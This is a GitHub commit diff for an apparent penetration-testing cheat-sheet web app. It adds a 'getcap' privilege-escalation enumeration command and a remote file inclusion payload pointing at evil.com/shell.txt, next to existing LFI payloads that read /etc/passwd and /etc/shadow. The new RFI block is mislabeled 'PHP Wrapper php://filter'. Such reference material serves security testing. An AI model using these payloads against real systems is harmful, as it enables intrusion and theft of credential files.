Skip to content

Commit 655f178

Browse files
LasCCLasCC
authored
Merge pull request #102 from Itsnexn/master
Add getcap and RFI Payload
2 parents d73df82 + 49ff878 commit 655f178

File tree

2 files changed

+35
-1
lines changed

2 files changed

+35
-1
lines changed

src/components/Linux_Shell/LinuxCommands.js

Lines changed: 2 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -8,7 +8,8 @@ export default (props) => {
88
{ title: 'find / -user root -perm /4000 2>/dev/null' },
99
{ title: 'find / -perm -u=s -type f 2>/dev/null' },
1010
{ title: "find / -type f -name '*.txt' 2>/dev/null" },
11-
{ title: 'find / -user root -perm -4000 -exec ls -ldb {}; > /tmp/suid' }
11+
{ title: 'find / -user root -perm -4000 -exec ls -ldb {}; > /tmp/suid' },
12+
{ title: 'getcap -r / 2>/dev/null'}
1213
];
1314
const VersionSystem = [
1415
{ title: 'cat /etc/issue' },

src/components/web/LFI.js

Lines changed: 33 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -16,6 +16,7 @@ export default (props) => {
1616
const directoryTraversal = `foo.php?file=../../../../../../../etc/passwd`;
1717
const phpWrapperLfi = `/example1.php?page=expect://ls`;
1818
const phpWrapperFilter = `/example1.php?page=php://filter/convert.base64-encode/resource=../../../../../etc/passwd`;
19+
const phpRfi = `http://example.com/index.php?page=http://evil.com/shell.txt`;
1920
const linux = [
2021
{ title: '/etc/passwd' },
2122
{ title: '/etc/shadow' },
@@ -171,6 +172,38 @@ export default (props) => {
171172
padding: 15,
172173
marginTop: 15
173174
}}
175+
>
176+
<Title level={3}>PHP Wrapper php://filter</Title>
177+
<Paragraph copyable ellipsis={true}>
178+
{phpRfi}
179+
</Paragraph>
180+
<Clipboard component='a' data-clipboard-text={phpRfi}>
181+
<Button
182+
type='primary'
183+
onClick={message.success('Your RFI payload has been copied')}
184+
style={{ marginBottom: 10, marginTop: 15 }}
185+
>
186+
<CopyOutlined />
187+
Copy the payload
188+
</Button>
189+
</Clipboard>
190+
<Clipboard component='a' data-clipboard-text={encodeURI(phpRfi)}>
191+
<Button
192+
type='dashed'
193+
onClick={message.success('Your RFI payload URL encoded has been copied')}
194+
style={{ marginBottom: 10, marginTop: 15, marginLeft: 15 }}
195+
>
196+
<LinkOutlined /> URL encoded
197+
</Button>
198+
</Clipboard>
199+
</div>
200+
<Divider dashed />
201+
<div
202+
key='e'
203+
style={{
204+
padding: 15,
205+
marginTop: 15
206+
}}
174207
>
175208
<Title level={3}>Useful LFI files</Title>
176209
<Title level={4}>Linux</Title>

0 commit comments

Comments
 (0)